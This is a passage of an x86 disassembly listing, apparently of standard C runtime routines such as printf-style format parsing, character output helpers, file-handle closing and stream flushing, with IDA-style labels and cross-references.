jge loc_41A540 ; default
or [ebp+var_4], 4
neg eax
loc_419F34: ; CODE XREF: sub_419E38+111�j
mov [ebp+var_20], eax
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_419F3C: ; CODE XREF: sub_419E38+DF�j
mov eax, [ebp+var_20]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
jmp short loc_419F34
; ---------------------------------------------------------------------------
loc_419F4B: ; CODE XREF: sub_419E38+6E�j
; DATA XREF: _0:off_41A559�o
mov [ebp+var_10], edx ; jumptable 00419EA6 case 4
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_419F53: ; CODE XREF: sub_419E38+6E�j
; DATA XREF: _0:off_41A559�o
cmp bl, 2Ah ; jumptable 00419EA6 case 5
jnz short loc_419F76
lea eax, [ebp+arg_8]
push eax
call sub_41A617
test eax, eax
pop ecx
mov [ebp+var_10], eax
jge loc_41A540 ; default
or [ebp+var_10], 0FFFFFFFFh
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_419F76: ; CODE XREF: sub_419E38+11E�j
lea eax, [ecx+ecx*4]
movsx ecx, bl
lea eax, [ecx+eax*2-30h]
mov [ebp+var_10], eax
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_419F88: ; CODE XREF: sub_419E38+6E�j
; DATA XREF: _0:off_41A559�o
cmp bl, 49h ; jumptable 00419EA6 case 6
jz short loc_419FBB
cmp bl, 68h
jz short loc_419FB2
cmp bl, 6Ch
jz short loc_419FA9
cmp bl, 77h
jnz loc_41A540 ; default
or byte ptr [ebp+var_4+1], 8
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_419FA9: ; CODE XREF: sub_419E38+15D�j
or [ebp+var_4], 10h
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_419FB2: ; CODE XREF: sub_419E38+158�j
or [ebp+var_4], 20h
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_419FBB: ; CODE XREF: sub_419E38+153�j
cmp byte ptr [edi], 36h
jnz short loc_419FD4
cmp byte ptr [edi+1], 34h
jnz short loc_419FD4
inc edi
inc edi
or byte ptr [ebp+var_4+1], 80h
mov [ebp+arg_4], edi
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_419FD4: ; CODE XREF: sub_419E38+186�j
; sub_419E38+18C�j
mov [ebp+var_30], edx
loc_419FD7: ; CODE XREF: sub_419E38+6E�j
; DATA XREF: _0:off_41A559�o
mov ecx, ds:off_433C70 ; jumptable 00419EA6 case 0
mov [ebp+var_24], edx
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41A003
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
movsx eax, bl
push eax
call sub_41A579
mov bl, [edi]
add esp, 0Ch
inc edi
mov [ebp+arg_4], edi
loc_41A003: ; CODE XREF: sub_419E38+1B0�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
movsx eax, bl
push eax
call sub_41A579
add esp, 0Ch
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_41A01B: ; CODE XREF: sub_419E38+6E�j
; DATA XREF: _0:off_41A559�o
movsx eax, bl ; jumptable 00419EA6 case 7
cmp eax, 67h
jg loc_41A243
cmp eax, 65h
jge loc_41A0C6
cmp eax, 58h
jg loc_41A124
jz loc_41A2B7
sub eax, 43h
jz loc_41A0E7
dec eax
dec eax
jz short loc_41A0BC
dec eax
dec eax
jz short loc_41A0BC
sub eax, 0Ch
jnz loc_41A442
test word ptr [ebp+var_4], 830h
jnz short loc_41A065
or byte ptr [ebp+var_4+1], 8
loc_41A065: ; CODE XREF: sub_419E38+227�j
; sub_419E38+42A�j
mov esi, [ebp+var_10]
cmp esi, 0FFFFFFFFh
jnz short loc_41A072
mov esi, 7FFFFFFFh
loc_41A072: ; CODE XREF: sub_419E38+233�j
lea eax, [ebp+arg_8]
push eax
call sub_41A617
test word ptr [ebp+var_4], 810h
pop ecx
mov ecx, eax
mov [ebp+var_8], ecx
jz loc_41A28B
test ecx, ecx
jnz short loc_41A09A
mov ecx, ds:off_433C6C
mov [ebp+var_8], ecx
loc_41A09A: ; CODE XREF: sub_419E38+257�j
mov [ebp+var_24], 1
mov eax, ecx
loc_41A0A3: ; CODE XREF: sub_419E38+282�j
mov edx, esi
dec esi
test edx, edx
jz loc_41A282
cmp word ptr [eax], 0
jz loc_41A282
inc eax
inc eax
jmp short loc_41A0A3
; ---------------------------------------------------------------------------
loc_41A0BC: ; CODE XREF: sub_419E38+212�j
; sub_419E38+216�j
mov [ebp+var_34], 1
add bl, 20h
loc_41A0C6: ; CODE XREF: sub_419E38+1F2�j
or [ebp+var_4], 40h
lea edi, [ebp+var_248]
cmp ecx, edx
mov [ebp+var_8], edi
jge loc_41A1AA
mov [ebp+var_10], 6
jmp loc_41A1B8
; ---------------------------------------------------------------------------
loc_41A0E7: ; CODE XREF: sub_419E38+20A�j
test word ptr [ebp+var_4], 830h
jnz short loc_41A0F3
or byte ptr [ebp+var_4+1], 8
loc_41A0F3: ; CODE XREF: sub_419E38+2B5�j
; sub_419E38+2F4�j
test word ptr [ebp+var_4], 810h
lea eax, [ebp+arg_8]
push eax
jz short loc_41A13A
call sub_41A634
push eax
lea eax, [ebp+var_248]
push eax
call sub_41FAFB
add esp, 0Ch
mov [ebp+var_C], eax
test eax, eax
jge short loc_41A14D
mov [ebp+var_28], 1
jmp short loc_41A14D
; ---------------------------------------------------------------------------
loc_41A124: ; CODE XREF: sub_419E38+1FB�j
sub eax, 5Ah
jz short loc_41A15B
sub eax, 9
jz short loc_41A0F3
dec eax
jz loc_41A31D
jmp loc_41A442
; ---------------------------------------------------------------------------
loc_41A13A: ; CODE XREF: sub_419E38+2C5�j
call sub_41A617
pop ecx
mov [ebp+var_248], al
mov [ebp+var_C], 1
loc_41A14D: ; CODE XREF: sub_419E38+2E1�j
; sub_419E38+2EA�j
lea eax, [ebp+var_248]
mov [ebp+var_8], eax
jmp loc_41A442
; ---------------------------------------------------------------------------
loc_41A15B: ; CODE XREF: sub_419E38+2EF�j
lea eax, [ebp+arg_8]
push eax
call sub_41A617
test eax, eax
pop ecx
jz short loc_41A19C
mov ecx, [eax+4]
test ecx, ecx
jz short loc_41A19C
test byte ptr [ebp+var_4+1], 8
jz short loc_41A18D
movsx eax, word ptr [eax]
shr eax, 1
mov [ebp+var_8], ecx
mov [ebp+var_C], eax
mov [ebp+var_24], 1
jmp loc_41A442
; ---------------------------------------------------------------------------
loc_41A18D: ; CODE XREF: sub_419E38+33C�j
and [ebp+var_24], 0
mov [ebp+var_8], ecx
movsx eax, word ptr [eax]
jmp loc_41A43F
; ---------------------------------------------------------------------------
loc_41A19C: ; CODE XREF: sub_419E38+32F�j
; sub_419E38+336�j
mov eax, ds:off_433C68
mov [ebp+var_8], eax
push eax
jmp loc_41A238
; ---------------------------------------------------------------------------
loc_41A1AA: ; CODE XREF: sub_419E38+29D�j
jnz short loc_41A1B8
cmp bl, 67h
jnz short loc_41A1B8
mov [ebp+var_10], 1
loc_41A1B8: ; CODE XREF: sub_419E38+2AA�j
; sub_419E38:loc_41A1AA�j ...
mov eax, [ebp+arg_8]
push [ebp+var_34]
add eax, 8
mov [ebp+arg_8], eax
push [ebp+var_10]
mov ecx, [eax-8]
mov [ebp+var_48], ecx
mov eax, [eax-4]
mov [ebp+var_44], eax
movsx eax, bl
push eax
lea eax, [ebp+var_248]
push eax
lea eax, [ebp+var_48]
push eax
call ds:off_435FD0
mov esi, [ebp+var_4]
add esp, 14h
and esi, 80h
jz short loc_41A20A
cmp [ebp+var_10], 0
jnz short loc_41A20A
lea eax, [ebp+var_248]
push eax
call ds:off_435FDC
pop ecx
loc_41A20A: ; CODE XREF: sub_419E38+3BC�j
; sub_419E38+3C2�j
cmp bl, 67h
jnz short loc_41A221
test esi, esi
jnz short loc_41A221
lea eax, [ebp+var_248]
push eax
call ds:off_435FD4
pop ecx
loc_41A221: ; CODE XREF: sub_419E38+3D5�j
; sub_419E38+3D9�j
cmp [ebp+var_248], 2Dh
jnz short loc_41A237
or byte ptr [ebp+var_4+1], 1
lea edi, [ebp+var_247]
mov [ebp+var_8], edi
loc_41A237: ; CODE XREF: sub_419E38+3F0�j
push edi
loc_41A238: ; CODE XREF: sub_419E38+36D�j
call sub_417AB0
pop ecx
jmp loc_41A43F
; ---------------------------------------------------------------------------
loc_41A243: ; CODE XREF: sub_419E38+1E9�j
sub eax, 69h
jz loc_41A31D
sub eax, 5
jz loc_41A2F3
dec eax
jz loc_41A2E0
dec eax
jz short loc_41A2B0
sub eax, 3
jz loc_41A065
dec eax
dec eax
jz loc_41A321
sub eax, 3
jnz loc_41A442
mov [ebp+var_2C], 27h
jmp short loc_41A2BE
; ---------------------------------------------------------------------------
loc_41A282: ; CODE XREF: sub_419E38+270�j
; sub_419E38+27A�j
sub eax, ecx
sar eax, 1
jmp loc_41A43F
; ---------------------------------------------------------------------------
loc_41A28B: ; CODE XREF: sub_419E38+24F�j
test ecx, ecx
jnz short loc_41A298
mov ecx, ds:off_433C68
mov [ebp+var_8], ecx
loc_41A298: ; CODE XREF: sub_419E38+455�j
mov eax, ecx
loc_41A29A: ; CODE XREF: sub_419E38+46F�j
mov edx, esi
dec esi
test edx, edx
jz short loc_41A2A9
cmp byte ptr [eax], 0
jz short loc_41A2A9
inc eax
jmp short loc_41A29A
; ---------------------------------------------------------------------------
loc_41A2A9: ; CODE XREF: sub_419E38+467�j
; sub_419E38+46C�j
sub eax, ecx
jmp loc_41A43F
; ---------------------------------------------------------------------------
loc_41A2B0: ; CODE XREF: sub_419E38+425�j
mov [ebp+var_10], 8
loc_41A2B7: ; CODE XREF: sub_419E38+201�j
mov [ebp+var_2C], 7
loc_41A2BE: ; CODE XREF: sub_419E38+448�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_C], 10h
jz short loc_41A328
mov al, byte ptr [ebp+var_2C]
mov [ebp+var_16], 30h
add al, 51h
mov [ebp+var_1C], 2
mov [ebp+var_15], al
jmp short loc_41A328
; ---------------------------------------------------------------------------
loc_41A2E0: ; CODE XREF: sub_419E38+41E�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_C], 8
jz short loc_41A328
or byte ptr [ebp+var_4+1], 2
jmp short loc_41A328
; ---------------------------------------------------------------------------
loc_41A2F3: ; CODE XREF: sub_419E38+417�j
lea eax, [ebp+arg_8]
push eax
call sub_41A617
test byte ptr [ebp+var_4], 20h
pop ecx
jz short loc_41A30C
mov cx, word ptr [ebp+var_14]
mov [eax], cx
jmp short loc_41A311
; ---------------------------------------------------------------------------
loc_41A30C: ; CODE XREF: sub_419E38+4C9�j
mov ecx, [ebp+var_14]
mov [eax], ecx
loc_41A311: ; CODE XREF: sub_419E38+4D2�j
mov [ebp+var_28], 1
jmp loc_41A540 ; default
; ---------------------------------------------------------------------------
loc_41A31D: ; CODE XREF: sub_419E38+2F7�j
; sub_419E38+40E�j
or [ebp+var_4], 40h
loc_41A321: ; CODE XREF: sub_419E38+432�j
mov [ebp+var_C], 0Ah
loc_41A328: ; CODE XREF: sub_419E38+491�j
; sub_419E38+4A6�j ...
test byte ptr [ebp+var_4+1], 80h
jz short loc_41A33A
lea eax, [ebp+arg_8]
push eax
call sub_41A624
pop ecx
jmp short loc_41A37B
; ---------------------------------------------------------------------------
loc_41A33A: ; CODE XREF: sub_419E38+4F4�j
test byte ptr [ebp+var_4], 20h
jz short loc_41A361
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_41A356
call sub_41A617
pop ecx
movsx eax, ax
loc_41A353: ; CODE XREF: sub_419E38+527�j
; sub_419E38+539�j
cdq
jmp short loc_41A37B
; ---------------------------------------------------------------------------
loc_41A356: ; CODE XREF: sub_419E38+510�j
call sub_41A617
pop ecx
movzx eax, ax
jmp short loc_41A353
; ---------------------------------------------------------------------------
loc_41A361: ; CODE XREF: sub_419E38+506�j
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_41A373
call sub_41A617
pop ecx
jmp short loc_41A353
; ---------------------------------------------------------------------------
loc_41A373: ; CODE XREF: sub_419E38+531�j
call sub_41A617
pop ecx
xor edx, edx
loc_41A37B: ; CODE XREF: sub_419E38+500�j
; sub_419E38+51C�j
test byte ptr [ebp+var_4], 40h
jz short loc_41A39C
test edx, edx
jg short loc_41A39C
jl short loc_41A38B
test eax, eax
jnb short loc_41A39C
loc_41A38B: ; CODE XREF: sub_419E38+54D�j
neg eax
adc edx, 0
mov esi, eax
neg edx
or byte ptr [ebp+var_4+1], 1
mov edi, edx
jmp short loc_41A3A0
; ---------------------------------------------------------------------------
loc_41A39C: ; CODE XREF: sub_419E38+547�j
; sub_419E38+54B�j ...
mov esi, eax
mov edi, edx
loc_41A3A0: ; CODE XREF: sub_419E38+562�j
test byte ptr [ebp+var_4+1], 80h
jnz short loc_41A3A9
and edi, 0
loc_41A3A9: ; CODE XREF: sub_419E38+56C�j
cmp [ebp+var_10], 0
jge short loc_41A3B8
mov [ebp+var_10], 1
jmp short loc_41A3BC
; ---------------------------------------------------------------------------
loc_41A3B8: ; CODE XREF: sub_419E38+575�j
and [ebp+var_4], 0FFFFFFF7h
loc_41A3BC: ; CODE XREF: sub_419E38+57E�j
mov eax, esi
or eax, edi
jnz short loc_41A3C6
and [ebp+var_1C], 0
loc_41A3C6: ; CODE XREF: sub_419E38+588�j
lea eax, [ebp+var_49]
mov [ebp+var_8], eax
loc_41A3CC: ; CODE XREF: sub_419E38+5DD�j
mov eax, [ebp+var_10]
dec [ebp+var_10]
test eax, eax
jg short loc_41A3DC
mov eax, esi
or eax, edi
jz short loc_41A417
loc_41A3DC: ; CODE XREF: sub_419E38+59C�j
mov eax, [ebp+var_C]
cdq
push edx
push eax
push edi
push esi
mov [ebp+var_40], eax
mov [ebp+var_3C], edx
call sub_4191D0
push [ebp+var_3C]
mov ebx, eax
add ebx, 30h
push [ebp+var_40]
push edi
push esi
call sub_419250
cmp ebx, 39h
mov esi, eax
mov edi, edx
jle short loc_41A40D
add ebx, [ebp+var_2C]
loc_41A40D: ; CODE XREF: sub_419E38+5D0�j
mov eax, [ebp+var_8]
dec [ebp+var_8]
mov [eax], bl
jmp short loc_41A3CC
; ---------------------------------------------------------------------------
loc_41A417: ; CODE XREF: sub_419E38+5A2�j
lea eax, [ebp+var_49]
sub eax, [ebp+var_8]
inc [ebp+var_8]
test byte ptr [ebp+var_4+1], 2
mov [ebp+var_C], eax
jz short loc_41A442
mov ecx, [ebp+var_8]
cmp byte ptr [ecx], 30h
jnz short loc_41A435
test eax, eax
jnz short loc_41A442
loc_41A435: ; CODE XREF: sub_419E38+5F7�j
dec [ebp+var_8]
inc eax
mov ecx, [ebp+var_8]
mov byte ptr [ecx], 30h
loc_41A43F: ; CODE XREF: sub_419E38+35F�j
; sub_419E38+406�j ...
mov [ebp+var_C], eax
loc_41A442: ; CODE XREF: sub_419E38+21B�j
; sub_419E38+2FD�j ...
cmp [ebp+var_28], 0
jnz loc_41A540 ; default
mov ebx, [ebp+var_4]
test bl, 40h
jz short loc_41A47A
test bh, 1
jz short loc_41A45F
mov [ebp+var_16], 2Dh
jmp short loc_41A473
; ---------------------------------------------------------------------------
loc_41A45F: ; CODE XREF: sub_419E38+61F�j
test bl, 1
jz short loc_41A46A
mov [ebp+var_16], 2Bh
jmp short loc_41A473
; ---------------------------------------------------------------------------
loc_41A46A: ; CODE XREF: sub_419E38+62A�j
test bl, 2
jz short loc_41A47A
mov [ebp+var_16], 20h
loc_41A473: ; CODE XREF: sub_419E38+625�j
; sub_419E38+630�j
mov [ebp+var_1C], 1
loc_41A47A: ; CODE XREF: sub_419E38+61A�j
; sub_419E38+635�j
mov esi, [ebp+var_20]
sub esi, [ebp+var_1C]
sub esi, [ebp+var_C]
test bl, 0Ch
jnz short loc_41A49A
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 20h
call sub_41A5AE
add esp, 10h
loc_41A49A: ; CODE XREF: sub_419E38+64E�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_16]
push [ebp+arg_0]
push [ebp+var_1C]
push eax
call sub_41A5DF
add esp, 10h
test bl, 8
jz short loc_41A4CC
test bl, 4
jnz short loc_41A4CC
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 30h
call sub_41A5AE
add esp, 10h
loc_41A4CC: ; CODE XREF: sub_419E38+67B�j
; sub_419E38+680�j
cmp [ebp+var_24], 0
jz short loc_41A513
cmp [ebp+var_C], 0
jle short loc_41A513
mov eax, [ebp+var_C]
mov ebx, [ebp+var_8]
lea edi, [eax-1]
loc_41A4E1: ; CODE XREF: sub_419E38+6D7�j
mov ax, [ebx]
inc ebx
push eax
lea eax, [ebp+var_38]
push eax
inc ebx
call sub_41FAFB
pop ecx
test eax, eax
pop ecx
jle short loc_41A528
lea ecx, [ebp+var_14]
push ecx
push [ebp+arg_0]
push eax
lea eax, [ebp+var_38]
push eax
call sub_41A5DF
add esp, 10h
mov eax, edi
dec edi
test eax, eax
jnz short loc_41A4E1
jmp short loc_41A528
; ---------------------------------------------------------------------------
loc_41A513: ; CODE XREF: sub_419E38+698�j
; sub_419E38+69E�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push [ebp+var_C]
push [ebp+var_8]
call sub_41A5DF
add esp, 10h
loc_41A528: ; CODE XREF: sub_419E38+6BC�j
; sub_419E38+6D9�j
test byte ptr [ebp+var_4], 4
jz short loc_41A540 ; default
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 20h
call sub_41A5AE
add esp, 10h
loc_41A540: ; CODE XREF: sub_419E38+68�j
; sub_419E38+8B�j ...
mov edi, [ebp+arg_4] ; default
mov bl, [edi]
inc edi
test bl, bl
mov [ebp+arg_4], edi
jnz loc_419E64
loc_41A551: ; CODE XREF: sub_419E38+1F�j
; sub_419E38+37�j
mov eax, [ebp+var_14]
pop edi
pop esi
pop ebx
leave
retn
sub_419E38 endp
; ---------------------------------------------------------------------------
off_41A559 dd offset loc_419FD7 ; DATA XREF: sub_419E38+6E�r
dd offset loc_419EAD ; jump table for switch statement
dd offset loc_419EC8
dd offset loc_419F14
dd offset loc_419F4B
dd offset loc_419F53
dd offset loc_419F88
dd offset loc_41A01B
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A579 proc near ; CODE XREF: sub_419E38+1BD�p
; sub_419E38+1D6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
dec dword ptr [ecx+4]
js short loc_41A592
mov edx, [ecx]
mov al, byte ptr [ebp+arg_0]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_41A59D
; ---------------------------------------------------------------------------
loc_41A592: ; CODE XREF: sub_41A579+9�j
push ecx
push [ebp+arg_0]
call sub_419D23
pop ecx
pop ecx
loc_41A59D: ; CODE XREF: sub_41A579+17�j
cmp eax, 0FFFFFFFFh
mov eax, [ebp+arg_8]
jnz short loc_41A5AA
or dword ptr [eax], 0FFFFFFFFh
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41A5AA: ; CODE XREF: sub_41A579+2A�j
inc dword ptr [eax]
pop ebp
retn
sub_41A579 endp
; =============== S U B R O U T I N E =======================================
sub_41A5AE proc near ; CODE XREF: sub_419E38+65A�p
; sub_419E38+68C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
push edi
mov edi, [esp+8+arg_4]
mov eax, edi
dec edi
test eax, eax
jle short loc_41A5DC
mov esi, [esp+8+arg_C]
loc_41A5BF: ; CODE XREF: sub_41A5AE+2C�j
push esi
push [esp+0Ch+arg_8]
push [esp+10h+arg_0]
call sub_41A579
add esp, 0Ch
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_41A5DC
mov eax, edi
dec edi
test eax, eax
jg short loc_41A5BF
loc_41A5DC: ; CODE XREF: sub_41A5AE+B�j
; sub_41A5AE+25�j
pop edi
pop esi
retn
sub_41A5AE endp
; =============== S U B R O U T I N E =======================================
sub_41A5DF proc near ; CODE XREF: sub_419E38+670�p
; sub_419E38+6CA�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov ebx, [esp+4+arg_4]
mov eax, ebx
dec ebx
push esi
push edi
test eax, eax
jle short loc_41A613
mov edi, [esp+0Ch+arg_C]
mov esi, [esp+0Ch+arg_0]
loc_41A5F5: ; CODE XREF: sub_41A5DF+32�j
movsx eax, byte ptr [esi]
push edi
inc esi
push [esp+10h+arg_8]
push eax
call sub_41A579
add esp, 0Ch
cmp dword ptr [edi], 0FFFFFFFFh
jz short loc_41A613
mov eax, ebx
dec ebx
test eax, eax
jg short loc_41A5F5
loc_41A613: ; CODE XREF: sub_41A5DF+C�j
; sub_41A5DF+2B�j
pop edi
pop esi
pop ebx
retn
sub_41A5DF endp
; =============== S U B R O U T I N E =======================================
sub_41A617 proc near ; CODE XREF: sub_419E38+E5�p
; sub_419E38+124�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov eax, [eax-4]
retn
sub_41A617 endp
; =============== S U B R O U T I N E =======================================
sub_41A624 proc near ; CODE XREF: sub_419E38+4FA�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 8
mov ecx, [eax]
mov eax, [ecx-8]
mov edx, [ecx-4]
retn
sub_41A624 endp
; =============== S U B R O U T I N E =======================================
sub_41A634 proc near ; CODE XREF: sub_419E38+2C7�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov ax, [eax-4]
retn
sub_41A634 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A642 proc near ; CODE XREF: sub_417794+17�p
; sub_417794+58�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_41A660
mov ecx, ds:off_433C70
movzx eax, word ptr [ecx+eax*2]
jmp short loc_41A6B2
; ---------------------------------------------------------------------------
loc_41A660: ; CODE XREF: sub_41A642+10�j
mov ecx, eax
push esi
mov esi, ds:off_433C70
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_41A685
and [ebp+var_2], 0
mov [ebp+var_4], cl
mov [ebp+var_3], al
push 2
jmp short loc_41A68E
; ---------------------------------------------------------------------------
loc_41A685: ; CODE XREF: sub_41A642+33�j
and [ebp+var_3], 0
mov [ebp+var_4], al
push 1
loc_41A68E: ; CODE XREF: sub_41A642+41�j
pop eax
lea ecx, [ebp+arg_0+2]
push 1
push 0
push 0
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_41FB63
add esp, 1Ch
test eax, eax
jnz short loc_41A6AE
leave
retn
; ---------------------------------------------------------------------------
loc_41A6AE: ; CODE XREF: sub_41A642+68�j
movzx eax, word ptr [ebp+arg_0+2]
loc_41A6B2: ; CODE XREF: sub_41A642+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_41A642 endp
; =============== S U B R O U T I N E =======================================
sub_41A6B7 proc near ; CODE XREF: sub_417900+2A�p
; sub_41FEC6+290�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
cmp edi, ds:dword_4CEDE0
jnb loc_41A751
mov eax, edi
mov esi, edi
sar eax, 5
and esi, 1Fh
lea ebx, ds:4CECE0h[eax*4]
shl esi, 3
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_41A751
push edi
call sub_41FE32
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41A730
cmp edi, 1
jz short loc_41A6FE
cmp edi, 2
jnz short loc_41A714
loc_41A6FE: ; CODE XREF: sub_41A6B7+40�j
push 2
call sub_41FE32
push 1
mov ebp, eax
call sub_41FE32
pop ecx
cmp eax, ebp
pop ecx
jz short loc_41A730
loc_41A714: ; CODE XREF: sub_41A6B7+45�j
push edi
call sub_41FE32
pop ecx
push eax
call ds:off_424078
test eax, eax
jnz short loc_41A730
call ds:dword_42408C ;; RtlGetLastWin32Error
mov ebp, eax
jmp short loc_41A732
; ---------------------------------------------------------------------------
loc_41A730: ; CODE XREF: sub_41A6B7+3B�j
; sub_41A6B7+5B�j ...
xor ebp, ebp
loc_41A732: ; CODE XREF: sub_41A6B7+77�j
push edi
call sub_41FDB8
mov eax, [ebx]
pop ecx
and byte ptr [eax+esi+4], 0
test ebp, ebp
jz short loc_41A74D
push ebp
call sub_41EF44
pop ecx
jmp short loc_41A762
; ---------------------------------------------------------------------------
loc_41A74D: ; CODE XREF: sub_41A6B7+8B�j
xor eax, eax
jmp short loc_41A765
; ---------------------------------------------------------------------------
loc_41A751: ; CODE XREF: sub_41A6B7+E�j
; sub_41A6B7+2F�j
and ds:dword_4CD9B8, 0
mov ds:dword_4CD9B4, 9
loc_41A762: ; CODE XREF: sub_41A6B7+94�j
or eax, 0FFFFFFFFh
loc_41A765: ; CODE XREF: sub_41A6B7+98�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41A6B7 endp
; =============== S U B R O U T I N E =======================================
sub_41A76A proc near ; CODE XREF: sub_417900+22�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_41A793
test al, 8
jz short loc_41A793
push dword ptr [esi+8]
call sub_417C3B
and word ptr [esi+0Ch], 0FBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_41A793: ; CODE XREF: sub_41A76A+A�j
; sub_41A76A+E�j
pop esi
retn
sub_41A76A endp
; =============== S U B R O U T I N E =======================================
sub_41A795 proc near ; CODE XREF: sub_41A835+2D�p
; sub_41A835+48�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_41A7A7
push esi
call sub_41A835
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41A7A7: ; CODE XREF: sub_41A795+7�j
push esi
call sub_41A7D0
test eax, eax
pop ecx
jz short loc_41A7B7
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41A7B7: ; CODE XREF: sub_41A795+1B�j
test byte ptr [esi+0Dh], 40h
jz short loc_41A7CC
push dword ptr [esi+10h]
call sub_41FE6F
neg eax
pop ecx
pop esi
sbb eax, eax
retn
; ---------------------------------------------------------------------------
loc_41A7CC: ; CODE XREF: sub_41A795+26�j
xor eax, eax
pop esi
retn
sub_41A795 endp
; =============== S U B R O U T I N E =======================================
sub_41A7D0 proc near ; CODE XREF: sub_417900+1A�p
; sub_418D0E+37�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
xor ebx, ebx
push edi
mov eax, [esi+0Ch]
mov ecx, eax
and ecx, 3
cmp cl, 2
jnz short loc_41A81D
test ax, 108h
jz short loc_41A81D
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_41A81D
push edi
push eax
push dword ptr [esi+10h]
call sub_41ED97
add esp, 0Ch
cmp eax, edi
jnz short loc_41A816
mov eax, [esi+0Ch]
test al, 80h
jz short loc_41A81D
and al, 0FDh
mov [esi+0Ch], eax
jmp short loc_41A81D
; ---------------------------------------------------------------------------
loc_41A816: ; CODE XREF: sub_41A7D0+36�j
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_41A81D: ; CODE XREF: sub_41A7D0+14�j
; sub_41A7D0+1A�j ...
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_41A7D0 endp
; =============== S U B R O U T I N E =======================================
sub_41A82C proc near ; CODE XREF: sub_41FAE7�p
push 1
call sub_41A835
pop ecx
retn
sub_41A82C endp
; =============== S U B R O U T I N E =======================================
sub_41A835 proc near ; CODE XREF: sub_41A795+A�p
; sub_41A82C+2�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
xor esi, esi
xor ebx, ebx
xor edi, edi
cmp ds:dword_4CECC0, esi
jle short loc_41A893
loc_41A846: ; CODE XREF: sub_41A835+5C�j
mov eax, ds:dword_4CDCB0
mov eax, [eax+esi*4]
test eax, eax
jz short loc_41A88A
mov ecx, [eax+0Ch]
test cl, 83h
jz short loc_41A88A
cmp [esp+0Ch+arg_0], 1
jnz short loc_41A870
push eax
call sub_41A795
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41A88A
inc ebx
jmp short loc_41A88A
; ---------------------------------------------------------------------------
loc_41A870: ; CODE XREF: sub_41A835+2A�j
cmp [esp+0Ch+arg_0], 0
jnz short loc_41A88A
test cl, 2
jz short loc_41A88A
push eax
call sub_41A795
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_41A88A
or edi, eax
loc_41A88A: ; CODE XREF: sub_41A835+1B�j
; sub_41A835+23�j ...
inc esi
cmp esi, ds:dword_4CECC0
jl short loc_41A846
loc_41A893: ; CODE XREF: sub_41A835+F�j
cmp [esp+0Ch+arg_0], 1
mov eax, ebx
jz short loc_41A89E
mov eax, edi
loc_41A89E: ; CODE XREF: sub_41A835+65�j
pop edi
pop esi
pop ebx
retn
sub_41A835 endp
